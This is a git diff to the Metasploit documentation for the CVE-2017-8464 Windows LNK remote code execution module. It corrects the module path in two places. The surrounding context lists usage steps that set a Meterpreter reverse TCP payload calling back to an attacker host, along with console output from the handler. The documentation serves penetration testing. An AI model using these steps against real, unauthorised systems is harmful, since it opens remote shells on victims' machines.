diff --git a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md index 4cefefb484..158714acc2 100644 --- a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md +++ b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md @@ -17,7 +17,7 @@ To set up the vulnerable environment, install a Windows version without the patc ### Run the exploit - 1. `use exploit/windows/smb/cve_2017_8464_lnk_rce` + 1. `use exploit/windows/fileformat/cve_2017_8464_lnk_rce` 2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp` 3. `set LHOST [ip victim connects back to]` 4. `exploit` @@ -55,7 +55,7 @@ msf exploit(handler) > exploit -j [*] Started reverse TCP handler on 192.168.146.197:4444 [*] Starting the payload handler... msf exploit(handler) > back -msf > use exploit/windows/smb/cve_2017_8464_lnk_rce +msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197